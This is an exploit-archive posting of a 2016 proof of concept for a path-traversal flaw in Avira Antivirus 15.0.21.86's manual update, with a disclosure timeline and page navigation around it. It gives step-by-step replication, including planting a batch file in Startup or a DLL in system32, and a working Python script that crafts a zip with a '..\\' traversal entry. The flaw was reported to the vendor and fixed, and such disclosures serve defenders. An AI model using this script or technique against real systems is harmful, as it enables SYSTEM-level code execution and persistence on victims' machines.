Avira Antivirus 15.0.21.86 Command Execution

Avira Antivirus 15.0.21.86 Command Execution: Posted Nov 9, 2016; Authored by R-73eN; Avira Antivirus versions 15.0.21.86 and below suffer from a command execution vulnerability.; tags | exploit; SHA-256 | 78a59e0dd369a5bd39deaf1ea862d4e542548155f19cd30868dfaf06d9060e7d; Download | Favorite | View

Avira Antivirus 15.0.21.86 Command Execution

# Title :  Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)
# Date : 08/11/2016
# Author : R-73eN
# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 - Reported to Vendor through Bugcrowd.
# 2016-06-29 - Vendor Replied.
# 2016-07-05 - Vendor Replicated the vulnerability.
# 2016-09-02 - Vendor released updated version which fix the vulnerability.
# 2016-11-08 - Public Disclosure
# I would like to thank Avira security team for the quick response. 
#
# Vulnerability Description:
# When the Avira Launcher manual update imports a zip file doesn't checks for " ../ " 
# characters which makes it possible to do a path traversal and write anywhere in the system.
# Vulnerability Replication
# 1. Create a special crafted zip file with the python script attached. 
# 2. The script will create a zip file named xvdf_fusebundle.zip with a filename test.bat (this can be changed) and will write this file to the root directory C:\ 
# 3. You can change the directory go to startup and when the user reboots the script will get executed or you can write a malicious dll to a program directory or 
#    system32 directory which will get loaded and we gain remote command execution. 
# 4. Open avira free antivirus 
# 5. Go to update -> Manual Update 
# 6. Select the malicious file 
# 7. Directory traversal was sucessfull
# Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q
# POC: 

#!/usr/bin/python -w
banner = ""
banner += "  ___        __        ____                 _    _  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner

import zipfile, sys


if(len(sys.argv) != 2):
    print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
    print "[+] Example: python exploit.py test.txt"
    exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("xvdf_fusebundle.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\test.bat")
zf.close()
print "[+] Created xvdf_fusebundle.zip successfully [+]"

# Fix:
# Update to the latest version.

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Avira Antivirus 15.0.21.86 Command Execution

Avira Antivirus 15.0.21.86 Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Avira Antivirus 15.0.21.86 Command Execution

Share This

Avira Antivirus 15.0.21.86 Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems